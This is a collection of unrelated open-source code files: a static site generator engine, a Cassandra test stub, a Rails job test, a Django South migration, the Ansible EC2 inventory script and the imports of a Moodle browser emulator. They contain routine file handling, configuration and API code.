#print "Trying to rename '%s' to '%s' now" %(src, dest)
MAX_RETRY_DURATION_s = 3
startTime = time.clock()
try:
while True:
try:
os.rename(src, dest)
break
except OSError as e:
#print "Error", e, "waiting a bit..."
if (time.clock() - startTime) > MAX_RETRY_DURATION_s:
raise
else:
time.sleep(0.1)
except (WindowsError, OSError) as e:
print "Error:", e
print "Waiting a bit for letting an optional Virus Scanner doing its work didn't help."
print "Possibly the upload software is (still) running and blocking the files?"
sys.exit(3)
def vss_remove(self, f):
""" virus scanner safe os.remove
"""
#print "Trying to remove '%s' now" %(f)
MAX_RETRY_DURATION_s = 3
startTime = time.clock()
try:
while True:
try:
os.remove(f)
break
except (OSError, WindowsError) as e:
#print "Error", e, "waiting a bit..."
if (time.clock() - startTime) > MAX_RETRY_DURATION_s:
raise
else:
time.sleep(0.1)
except (WindowsError, OSError) as e:
print "Error:", e
print "Waiting a bit for letting an optional Virus Scanner doing its work didn't help."
print "Possibly the upload software is (still) running and blocking the files?"
sys.exit(3)
def vss_rmtree(self, d):
""" virus scanner safe shutil.rmtree
"""
#print "Trying to remove directory tree '%s' now" %(d)
MAX_RETRY_DURATION_s = 3
startTime = time.clock()
try:
while True:
try:
shutil.rmtree(d)
break
except (WindowsError, OSError) as e:
#print "Error", e, "waiting a bit..."
if (time.clock() - startTime) > MAX_RETRY_DURATION_s:
raise
else:
time.sleep(0.1)
except (WindowsError, OSError) as e:
print "Error:", e
print "Waiting a bit for letting an optional Virus Scanner doing its work didn't help."
print "Possibly the upload software is (still) running and blocking the files?"
sys.exit(3)
def handle_output_dir(self):
if self.error_count == 0:
os.chdir(self.SITE_ROOT)
if os.path.isdir(self.options['output_dir']+'.bak'):
self.vss_rmtree(self.options['output_dir']+'.bak')
if os.path.isdir(self.options['output_dir']):
if self.options['create_backup']:
# This rename (the original os.rename()) wasn't a problem,
# but using the safe call here too now.
self.vss_rename(self.options['output_dir'], self.options['output_dir']+'.bak')
else:
#another tried workaround for the virus scanner problem. Didn't help.
#tmpname = self.options['output_dir']+'.del'+ datetime.strftime(datetime.now(), "%Y%m%d%H%M%S")
#print "Renaming output to", tmpname, " - as bughandling"
#os.rename(self.options['output_dir'], tmpname)
##print "and delete it then"
##shutil.rmtree(tmpname)
self.vss_rmtree(self.options['output_dir'])
#if os.path.isdir(self.options['output_dir']):
# print self.options['output_dir'], "found"
#else:
# print "NO", self.options['output_dir'], "found"
#
#if os.path.isdir(self.options['working_dir']):
# print self.options['working_dir'], "found"
#else:
# print "NO", self.options['working_dir'], "found"
# Here the originally used os.rename() often failed on Windows.
# See documentation in vss_rename().
self.vss_rename(self.options['working_dir'], self.options['output_dir'])
else:
print ""
print "Result:"
print "Due to errors there has no (new) output directory '%s' been created!" % (self.options['output_dir'])
print "The files are still in '%s' and the last successful run remains in '%s'." % (self.options['working_dir'], self.options['output_dir'])
def read_options(self):
"""Load options from the config file."""
self.options = Engine.default_options.copy()
if os.path.isfile('wokconfig'):
with open('wokconfig') as f:
yaml_config = yaml.load(f)
if yaml_config:
self.options.update(yaml_config)
else:
logging.warn("Deprecation: You are still using the old config file name 'config'."
" The preferred new name is 'wokconfig'.")
if os.path.isfile('config'):
with open('config') as f:
yaml_config = yaml.load(f)
if yaml_config:
self.options.update(yaml_config)
# Make authors a list, even only a single author was specified.
authors = self.options.get('authors', self.options.get('author', None))
if isinstance(authors, list):
self.options['authors'] = [Author.parse(a) for a in authors]
elif isinstance(authors, str):
csv = authors.split(',')
self.options['authors'] = [Author.parse(a) for a in csv]
if len(self.options['authors']) > 1:
logging.warn('Deprecation Warning: Use YAML lists instead of '
'CSV for multiple authors. i.e. ["John Doe", "Jane '
'Smith"] instead of "John Doe, Jane Smith". In wokconfig '
'file.')
# Make exclude_files a list, even only a single pattern was specified.
exclude_files = self.options.get('exclude_files', None)
if isinstance(exclude_files, str):
self.options['exclude_files'] = [e.strip() for e in exclude_files.split(',')]
if len(self.options['exclude_files']) > 1:
logging.warn('Deprecation Warning: Use YAML lists instead of '
'CSV for multiple file exclusions. i.e. ["*.ignore", '
'"__*"] instead of "*.ignore , __*" in wokconfig file.')
if '{type}' in self.options['url_pattern']:
logging.warn('Deprecation Warning: You should use {ext} instead '
'of {type} in the url pattern specified in the wokconfig '
'file.')
# Set locale if needed
wanted_locale = self.options.get('locale')
if wanted_locale is not None:
try:
locale.setlocale(locale.LC_TIME, wanted_locale)
except locale.Error as err:
logging.warn('Unable to set locale to `%s`: %s',
wanted_locale, err
)
# make sure that output_dir is always only a name, not any path!
outdir = os.path.basename(self.options['output_dir'].strip("./"))
if outdir != self.options['output_dir']:
logging.error("Option 'output_dir' must not contain a path (%s), "
"only a directory name! Stripped it down to '%s'."
% (self.options['output_dir'], outdir))
self.options['output_dir'] = outdir
# add a subdir prefix to the output_dir, if present in the config
self.options['server_root'] = self.options['output_dir']
if self.options.get('url_subdir', ''):
self.options['output_dir'] = os.path.join(self.options['output_dir'], self.options['url_subdir'])
def renderer_options(self):
"""Monkeypatches renderer options as in `wokconfig` file."""
# Markdown extra plugins
markdown_extra_plugins = \
self.options.get('markdown_extra_plugins', [])
if hasattr(renderers, 'Markdown'):
renderers.Markdown.plugins.extend(markdown_extra_plugins)
if hasattr(renderers, 'Markdown2'):
renderers.Markdown2.extras.extend(markdown_extra_plugins)
# reStructuredText options
if hasattr(renderers, 'ReStructuredText'):
renderers.ReStructuredText.options.update( \
{'doctitle' : self.options.get('rst_doctitle', False), \
'initial_header_level' : self.options.get('rst_initial_header_level', 1),
'strip_comments' : self.options.get('rst_strip_comments', True),
'toc_backlinks' : self.options.get('rst_toc_backlinks', 'entry'),
})
def sanity_check(self):
"""Basic sanity checks."""
# Make sure that this is (probabably) a wok source directory.
if not (os.path.isdir('templates') or os.path.isdir('content')):
logging.critical("This doesn't look like a wok site. Aborting.")
sys.exit(1)
def load_hooks(self):
try:
sys.path.append('hooks')
import __hooks__
self.hooks = __hooks__.hooks
logging.info('Loaded {0} hooks: {0}'.format(self.hooks))
except ImportError as e:
if "__hooks__" in str(e):
logging.info('No hooks module found.')
else:
# don't catch import errors raised within a hook
logging.info('Import error within hooks.')
raise
def run_hook(self, hook_name, *args):
""" Run specified hooks if they exist """
logging.debug('Running hook {0}'.format(hook_name))
returns = []
try:
for hook in self.hooks.get(hook_name, []):
returns.append(hook(self.options, *args))
except AttributeError:
logging.info('Hook {0} not defined'.format(hook_name))
return returns
def prepare_output(self):
"""
Prepare the output/working directory.
Remove any contents already there,
and then copy over the media files, if they exist.
"""
output_dir = self.options['working_dir']
if os.path.isdir(output_dir):
for name in os.listdir(output_dir):
# Don't remove dotfiles #todo: why? What about copying from output_dir?
if name[0] == ".":
continue
path = os.path.join(output_dir, name)
if os.path.isfile(path):
self.vss_remove(path)
else:
self.vss_rmtree(path)
else:
os.makedirs(output_dir)
self.run_hook('site.output.pre', output_dir)
# Copy the media directory to the output folder
if os.path.isdir(self.options['media_dir']):
try:
for name in os.listdir(self.options['media_dir']):
path = os.path.join(self.options['media_dir'], name)
if os.path.isdir(path):
shutil.copytree(
path,
os.path.join(output_dir, name),
symlinks=True
)
else:
shutil.copy(path, output_dir)
# Do nothing if the media directory doesn't exist
except OSError:
logging.warning('There was a problem copying the media files '
'to the output directory.')
self.run_hook('site.output.post', output_dir)
def load_pages(self):
"""Load all the content files."""
error_count = 0
# Load pages from hooks (pre)
for pages in self.run_hook('site.content.gather.pre'):
if pages:
self.all_pages.extend(pages)
# Load files
for root, dirs, files in os.walk(self.options['content_dir']):
# Grab all the parsable files
for f in files:
# Don't parse hidden files.
if f.startswith('.'):
continue
# Don't parse excluded files.
if self.options['exclude_files']:
exclude_it = False
for exf in self.options['exclude_files']:
if fnmatch.fnmatch(f, exf):
logging.info('File ignored due to user exclusion: {0}'.format(f))
exclude_it = True
break
if exclude_it:
continue
ext = f.split('.')[-1]
renderer = renderers.Plain
for r in renderers.all:
if ext in r.extensions:
renderer = r
break
else:
logging.warning('No parser found '
'for {0}. Using default renderer.'.format(f))
renderer = renderers.Renderer
p = Page.from_file(os.path.join(root, f), self.options, self, renderer)
if p and p.errorlog:
error_count += 1
print "ERRORS in", p.filename
for line in p.errorlog:
print " ", line
print
p.errorlog = [] # clear for next stage!
if p and p.meta['published']:
self.all_pages.append(p)
# Load pages from hooks (post)
for pages in self.run_hook('site.content.gather.post', self.all_pages):
if pages:
self.all_pages.extend(pages)
return error_count
def make_tree(self):
"""
Make the category pseudo-tree.
In this structure, each node is a page. Pages with sub pages are
interior nodes, and leaf nodes have no sub pages. It is not truly a
tree, because the root node doesn't exist.
"""
self.categories = {}
site_tree = []
# We want to parse these in a approximately breadth first order
self.all_pages.sort(key=lambda p: len(p.meta['category']))
# For every page
for p in self.all_pages:
# If it has a category (ie: is not at top level)
if len(p.meta['category']) > 0:
top_cat = p.meta['category'][0]
if not top_cat in self.categories:
self.categories[top_cat] = []
self.categories[top_cat].append(p.meta)
try:
# Put this page's meta in the right place in site_tree.
siblings = site_tree
for cat in p.meta['category']:
# This line will fail if the page is an orphan
parent = [subpage for subpage in siblings
if subpage['slug'] == cat][0]
siblings = parent['subpages']
siblings.append(p.meta)
except IndexError:
logging.error('It looks like the page "{0}" is an orphan! '
'This will probably cause problems.'.format(p.path))
def render_site(self):
"""Render every page and write the output files."""
error_count = 0
logging.info("****************** render_site")
# Gather tags
tag_set = set()
for p in self.all_pages:
tag_set = tag_set.union(p.meta['tags'])
tag_dict = dict()
for tag in tag_set:
# Add all pages with the current tag to the tag dict
tag_dict[tag] = [p.meta for p in self.all_pages
if tag in p.meta['tags']]
# Gather slugs
slug_dict = dict((p.meta['slug'], p.meta) for p in self.all_pages)
for p in self.all_pages:
# Construct this every time, to avoid sharing one instance
# between page objects.
templ_vars = {
'site': {
'title': self.options.get('site_title', 'Untitled'),
'datetime': datetime.now(),
'date': datetime.now().date(),
'time': datetime.now().time(),
'tags': tag_dict,
'pages': self.all_pages[:],
'categories': self.categories,
'slugs': slug_dict,
},
}
for k, v in self.options.iteritems():
if k not in ('site_title', 'output_dir', 'content_dir',
'working_dir', 'create_backup', 'templates_dir',
'media_dir', 'url_pattern'):
templ_vars['site'][k] = v
if 'author' in self.options:
templ_vars['site']['author'] = self.options['author']
if self.runserver:
templ_vars['site']['base'] = '<base href="">'
else:
templ_vars['site']['base'] = '<base href="%s">' % self.options.get("base", "")
# Rendering the page might give us back more pages to render.
new_pages = p.render(templ_vars)
if p and p.errorlog:
error_count += 1
print "ERRORS while working on", p.filename
for line in p.errorlog:
print " ", line
p.errorlog = [] # just cleanup
if p.meta['make_file']:
p.write()
if new_pages:
logging.debug('found new_pages')
self.all_pages += new_pages
return error_count
if __name__ == '__main__':
Engine()
exit(0) | unknown | codeparrot/codeparrot-clean | ||
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# to configure behavior, define $CQL_TEST_HOST to the destination address
# for Thrift connections, and $CQL_TEST_PORT to the associated port.
from .basecase import BaseTestCase
class TestCqlshInvocation(BaseTestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_normal_run(self):
pass
def test_python_interpreter_location(self):
pass
def test_color_capability_detection(self):
pass
def test_colored_output(self):
pass
def test_color_cmdline_option(self):
pass
def test_debug_option(self):
pass
def test_connection_args(self):
pass
def test_connection_config(self):
pass
def test_connection_envvars(self):
pass
def test_command_history(self):
pass
def test_missing_dependencies(self):
pass
def test_completekey_config(self):
pass
def test_ctrl_c(self):
pass
def test_eof(self):
pass
def test_output_encoding_detection(self):
pass
def test_output_encoding(self):
pass
def test_retries(self):
pass | unknown | codeparrot/codeparrot-clean | ||
# frozen_string_literal: true
class BeforeEnqueueError < StandardError; end
class RetriesJob < ActiveJob::Base
attr_accessor :raise_before_enqueue
# The job fails in before_enqueue the first time it retries itself.
before_perform do
self.raise_before_enqueue = true
end
# The job fails once to enqueue/retry itself, then succeeds.
before_enqueue do
raise BeforeEnqueueError if raise_before_enqueue
ensure
@raise_before_enqueue = false
end
# The job retries on BeforeEnqueueError errors.
retry_on BeforeEnqueueError
def perform
retry_job if executions <= 1
end
end | ruby | github | https://github.com/rails/rails | activejob/test/jobs/retries_job.rb |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'UserProfile.name'
db.alter_column('auth_userprofile', 'name', self.gf('django.db.models.fields.CharField')(max_length=255))
# Adding index on 'UserProfile', fields ['name']
db.create_index('auth_userprofile', ['name'])
# Changing field 'UserProfile.language'
db.alter_column('auth_userprofile', 'language', self.gf('django.db.models.fields.CharField')(max_length=255))
# Adding index on 'UserProfile', fields ['language']
db.create_index('auth_userprofile', ['language'])
# Changing field 'UserProfile.courseware'
db.alter_column('auth_userprofile', 'courseware', self.gf('django.db.models.fields.CharField')(max_length=255))
# Changing field 'UserProfile.meta'
db.alter_column('auth_userprofile', 'meta', self.gf('django.db.models.fields.CharField')(max_length=255))
# Changing field 'UserProfile.location'
db.alter_column('auth_userprofile', 'location', self.gf('django.db.models.fields.CharField')(max_length=255))
# Adding index on 'UserProfile', fields ['location']
db.create_index('auth_userprofile', ['location'])
def backwards(self, orm):
# Removing index on 'UserProfile', fields ['location']
db.delete_index('auth_userprofile', ['location'])
# Removing index on 'UserProfile', fields ['language']
db.delete_index('auth_userprofile', ['language'])
# Removing index on 'UserProfile', fields ['name']
db.delete_index('auth_userprofile', ['name'])
# Changing field 'UserProfile.name'
db.alter_column('auth_userprofile', 'name', self.gf('django.db.models.fields.TextField')())
# Changing field 'UserProfile.language'
db.alter_column('auth_userprofile', 'language', self.gf('django.db.models.fields.TextField')())
# Changing field 'UserProfile.courseware'
db.alter_column('auth_userprofile', 'courseware', self.gf('django.db.models.fields.TextField')())
# Changing field 'UserProfile.meta'
db.alter_column('auth_userprofile', 'meta', self.gf('django.db.models.fields.TextField')())
# Changing field 'UserProfile.location'
db.alter_column('auth_userprofile', 'location', self.gf('django.db.models.fields.TextField')())
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'avatar_type': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '1'}),
'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'consecutive_days_visit_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'display_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'email_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'interesting_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'new_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'seen_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_country': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'student.registration': {
'Meta': {'object_name': 'Registration', 'db_table': "'auth_registration'"},
'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'student.userprofile': {
'Meta': {'object_name': 'UserProfile', 'db_table': "'auth_userprofile'"},
'courseware': ('django.db.models.fields.CharField', [], {'default': "'course.xml'", 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'meta': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
}
}
complete_apps = ['student'] | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
import sys
import os
'''
EC2 external inventory script
=================================
Generates inventory that Ansible can understand by making API request to
AWS EC2 using the Boto library.
NOTE: This script assumes Ansible is being executed where the environment
variables needed for Boto have already been set:
export AWS_ACCESS_KEY_ID='AK123'
export AWS_SECRET_ACCESS_KEY='abc123'
If you're using eucalyptus you need to set the above variables and
you need to define:
export EC2_URL=http://hostname_of_your_cc:port/services/Eucalyptus
For more details, see: http://docs.pythonboto.org/en/latest/boto_config_tut.html
When run against a specific host, this script returns the following variables:
- ec2_ami_launch_index
- ec2_architecture
- ec2_association
- ec2_attachTime
- ec2_attachment
- ec2_attachmentId
- ec2_client_token
- ec2_deleteOnTermination
- ec2_description
- ec2_deviceIndex
- ec2_dns_name
- ec2_eventsSet
- ec2_group_name
- ec2_hypervisor
- ec2_id
- ec2_image_id
- ec2_instanceState
- ec2_instance_type
- ec2_ipOwnerId
- ec2_ip_address
- ec2_item
- ec2_kernel
- ec2_key_name
- ec2_launch_time
- ec2_monitored
- ec2_monitoring
- ec2_networkInterfaceId
- ec2_ownerId
- ec2_persistent
- ec2_placement
- ec2_platform
- ec2_previous_state
- ec2_private_dns_name
- ec2_private_ip_address
- ec2_publicIp
- ec2_public_dns_name
- ec2_ramdisk
- ec2_reason
- ec2_region
- ec2_requester_id
- ec2_root_device_name
- ec2_root_device_type
- ec2_security_group_ids
- ec2_security_group_names
- ec2_shutdown_state
- ec2_sourceDestCheck
- ec2_spot_instance_request_id
- ec2_state
- ec2_state_code
- ec2_state_reason
- ec2_status
- ec2_subnet_id
- ec2_tenancy
- ec2_virtualization_type
- ec2_vpc_id
These variables are pulled out of a boto.ec2.instance object. There is a lack of
consistency with variable spellings (camelCase and underscores) since this
just loops through all variables the object exposes. It is preferred to use the
ones with underscores when multiple exist.
In addition, if an instance has AWS Tags associated with it, each tag is a new
variable named:
- ec2_tag_[Key] = [Value]
Security groups are comma-separated in 'ec2_security_group_ids' and
'ec2_security_group_names'.
'''
# (c) 2012, Peter Sankauskas
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
######################################################################
import sys
import os
import argparse
import re
from time import time
import boto
from boto import ec2
import ConfigParser
try:
import json
except ImportError:
import simplejson as json
class Ec2Inventory(object):
def __init__(self):
''' Main execution path '''
# Inventory grouped by instance IDs, tags, security groups, regions,
# and availability zones
self.inventory = {}
# Index of hostname (address) to instance ID
self.index = {}
# Read settings and parse CLI arguments
self.parse_cli_args()
self.read_settings()
# Cache
if self.args.refresh_cache:
self.do_api_calls_update_cache()
elif not self.is_cache_valid():
self.do_api_calls_update_cache()
# Data to print
if self.args.host:
data_to_print = self.get_host_info()
elif self.args.list:
# Display list of instances for inventory
if len(self.inventory) == 0:
data_to_print = self.get_inventory_from_cache()
else:
data_to_print = self.json_format_dict(self.inventory, True)
print data_to_print
def is_cache_valid(self):
''' Determines if the cache files have expired, or if it is still valid '''
if os.path.isfile(self.cache_path_cache):
mod_time = os.path.getmtime(self.cache_path_cache)
current_time = time()
if (mod_time + self.cache_max_age) > current_time:
if os.path.isfile(self.cache_path_index):
return True
return False
def read_settings(self):
''' Reads the settings from the ec2.ini file '''
config = ConfigParser.SafeConfigParser()
config.read(self.args.inifile)
# is eucalyptus?
self.eucalyptus_host = None
self.eucalyptus = False
if config.has_option('ec2', 'eucalyptus'):
self.eucalyptus = config.getboolean('ec2', 'eucalyptus')
if self.eucalyptus and config.has_option('ec2', 'eucalyptus_host'):
self.eucalyptus_host = config.get('ec2', 'eucalyptus_host')
# Regions
self.regions = []
configRegions = config.get('ec2', 'regions')
if (configRegions == 'all'):
if self.eucalyptus_host:
self.regions.append(boto.connect_euca(host=self.eucalyptus_host).region.name)
else:
for regionInfo in ec2.regions():
self.regions.append(regionInfo.name)
else:
self.regions = configRegions.split(",")
# Destination addresses
self.destination_variable = config.get('ec2', 'destination_variable')
self.vpc_destination_variable = config.get('ec2', 'vpc_destination_variable')
# Cache related
cache_path = config.get('ec2', 'cache_path')
self.cache_path_cache = cache_path + "/ansible-ec2.cache"
self.cache_path_index = cache_path + "/ansible-ec2.index"
self.cache_max_age = config.getint('ec2', 'cache_max_age')
def parse_cli_args(self):
''' Command line argument processing '''
parser = argparse.ArgumentParser(description='Produce an Ansible Inventory file based on EC2')
parser.add_argument('--list', action='store_true', default=True,
help='List instances (default: True)')
parser.add_argument('--host', action='store',
help='Get all the variables about a specific instance')
parser.add_argument('--refresh-cache', action='store_true', default=False,
help='Force refresh of cache by making API requests to EC2 (default: False - use cache files)')
default_inifile = os.environ.get("ANSIBLE_EC2_INI", os.path.dirname(os.path.realpath(__file__))+'/ec2.ini')
parser.add_argument('--inifile', dest='inifile', help='Path to init script to use', default=default_inifile)
self.args = parser.parse_args()
def do_api_calls_update_cache(self):
''' Do API calls to each region, and save data in cache files '''
for region in self.regions:
self.get_instances_by_region(region)
self.write_to_cache(self.inventory, self.cache_path_cache)
self.write_to_cache(self.index, self.cache_path_index)
def get_instances_by_region(self, region):
''' Makes an AWS EC2 API call to the list of instances in a particular
region '''
try:
if self.eucalyptus:
conn = boto.connect_euca(host=self.eucalyptus_host)
conn.APIVersion = '2010-08-31'
else:
conn = ec2.connect_to_region(region)
reservations = conn.get_all_instances()
for reservation in reservations:
for instance in reservation.instances:
self.add_instance(instance, region)
except boto.exception.BotoServerError as e:
if not self.eucalyptus:
print "Looks like AWS is down again:"
print e
sys.exit(1)
def get_instance(self, region, instance_id):
''' Gets details about a specific instance '''
if self.eucalyptus:
conn = boto.connect_euca(self.eucalyptus_host)
conn.APIVersion = '2010-08-31'
else:
conn = ec2.connect_to_region(region)
reservations = conn.get_all_instances([instance_id])
for reservation in reservations:
for instance in reservation.instances:
return instance
def add_instance(self, instance, region):
''' Adds an instance to the inventory and index, as long as it is
addressable '''
# Only want running instances
if instance.state != 'running':
return
# Select the best destination address
if instance.subnet_id:
dest = getattr(instance, self.vpc_destination_variable)
else:
dest = getattr(instance, self.destination_variable)
if not dest:
# Skip instances we cannot address (e.g. private VPC subnet)
return
# Add to index
self.index[dest] = [region, instance.id]
# Inventory: Group by instance ID (always a group of 1)
self.inventory[instance.id] = [dest]
# Inventory: Group by region
self.push(self.inventory, region, dest)
# Inventory: Group by availability zone
self.push(self.inventory, instance.placement, dest)
# Inventory: Group by instance type
self.push(self.inventory, self.to_safe('type_' + instance.instance_type), dest)
# Inventory: Group by key pair
if instance.key_name:
self.push(self.inventory, self.to_safe('key_' + instance.key_name), dest)
# Inventory: Group by security group
try:
for group in instance.groups:
key = self.to_safe("security_group_" + group.name)
self.push(self.inventory, key, dest)
except AttributeError:
print 'Package boto seems a bit older.'
print 'Please upgrade boto >= 2.3.0.'
sys.exit(1)
# Inventory: Group by tag keys
for k, v in instance.tags.iteritems():
key = self.to_safe("tag_" + k + "=" + v)
self.push(self.inventory, key, dest)
def get_host_info(self):
''' Get variables about a specific host '''
if len(self.index) == 0:
# Need to load index from cache
self.load_index_from_cache()
if not self.args.host in self.index:
# try updating the cache
self.do_api_calls_update_cache()
if not self.args.host in self.index:
# host migh not exist anymore
return self.json_format_dict({}, True)
(region, instance_id) = self.index[self.args.host]
instance = self.get_instance(region, instance_id)
instance_vars = {}
for key in vars(instance):
value = getattr(instance, key)
key = self.to_safe('ec2_' + key)
# Handle complex types
if type(value) in [int, bool]:
instance_vars[key] = value
elif type(value) in [str, unicode]:
instance_vars[key] = value.strip()
elif type(value) == type(None):
instance_vars[key] = ''
elif key == 'ec2_region':
instance_vars[key] = value.name
elif key == 'ec2_tags':
for k, v in value.iteritems():
key = self.to_safe('ec2_tag_' + k)
instance_vars[key] = v
elif key == 'ec2_groups':
group_ids = []
group_names = []
for group in value:
group_ids.append(group.id)
group_names.append(group.name)
instance_vars["ec2_security_group_ids"] = ','.join(group_ids)
instance_vars["ec2_security_group_names"] = ','.join(group_names)
else:
pass
# TODO Product codes if someone finds them useful
#print key
#print type(value)
#print value
return self.json_format_dict(instance_vars, True)
def push(self, my_dict, key, element):
''' Pushed an element onto an array that may not have been defined in
the dict '''
if key in my_dict:
my_dict[key].append(element)
else:
my_dict[key] = [element]
def get_inventory_from_cache(self):
''' Reads the inventory from the cache file and returns it as a JSON
object '''
cache = open(self.cache_path_cache, 'r')
json_inventory = cache.read()
return json_inventory
def load_index_from_cache(self):
''' Reads the index from the cache file sets self.index '''
cache = open(self.cache_path_index, 'r')
json_index = cache.read()
self.index = json.loads(json_index)
def write_to_cache(self, data, filename):
''' Writes data in JSON format to a file '''
json_data = self.json_format_dict(data, True)
cache = open(filename, 'w')
cache.write(json_data)
cache.close()
def to_safe(self, word):
''' Converts 'bad' characters in a string to underscores so they can be
used as Ansible groups '''
return re.sub("[^A-Za-z0-9\-]", "_", word)
def json_format_dict(self, data, pretty=False):
''' Converts a dict to a JSON object and dumps it as a formatted
string '''
if pretty:
return json.dumps(data, sort_keys=True, indent=2)
else:
return json.dumps(data)
# Run the script
Ec2Inventory() | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# encoding: utf-8
"""Class to spin up a headless browser to handle Moodle interaction
"""
from mechanize import Browser, CookieJar
from bs4 import BeautifulSoup
from moodlefuse.exception import throws_moodlefuse_error
from moodlefuse.moodle.emulator.emulator import Emulator
from moodlefuse.moodle.resources import resource_errors
